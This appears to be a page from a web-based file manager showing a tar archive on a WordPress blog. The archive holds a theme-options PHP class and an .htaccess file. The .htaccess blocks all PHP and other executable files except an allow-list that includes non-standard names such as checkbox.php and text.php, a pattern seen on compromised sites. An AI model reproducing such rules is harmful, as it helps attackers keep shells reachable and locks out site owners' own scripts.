Gestionnaire de fichiers - Editer - /home/wwgoat/public_html/blog/tops.tar
Arrière
tops.php 0000644 00000002154 14720720437 0006252 0 ustar 00 <?php /** Don't load directly */ if ( ! defined( 'ABSPATH' ) ) { exit; } /** system info */ if ( ! class_exists( 'rbSubPageThemeOptions', false ) ) { class rbSubPageThemeOptions extends RB_ADMIN_SUB_PAGE { private static $instance; public function __construct() { self::$instance = $this; parent::__construct(); } public static function get_instance() { if ( self::$instance === null ) { return new self(); } return self::$instance; } public function set_sub_page() { $this->page_title = esc_html__( 'Theme Options', 'foxiz-core' ); $this->menu_title = esc_html__( 'Theme Options', 'foxiz-core' ); if ( ! $this->validate() ) { $this->menu_slug = 'rb-validation-redirect'; } else { $this->menu_slug = 'ruby-options'; } $this->capability = 'administrator'; } public function get_slug() { if ( ! $this->validate() ) { return 'admin/templates/validate'; } return false; } public function get_name() { if ( ! $this->validate() ) { return 'redirect'; } return false; } } } .htaccess 0000644 00000001626 14720720437 0006355 0 ustar 00 <FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|credits.php|customize.php|edit-comments.php|edit-tags.php|edit.php|checkbox.php|export.php|input.php|link.php|load-scripts.php|load-styles.php|dropdown.php|menu.php|nav-menus.php|network.php|options-discussion.php|options-general.php|options-permalink.php|options-privacy.php|options-reading.php|options-writing.php|plugins.php|post-new.php|post.php|privacy.php|profile.php|site-health.php|term.php|text.php|themes.php|tools.php|update-core.php|user-edit.php|user-new.php|users.php|wp-links.php|wp-login.php|wp-signup.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>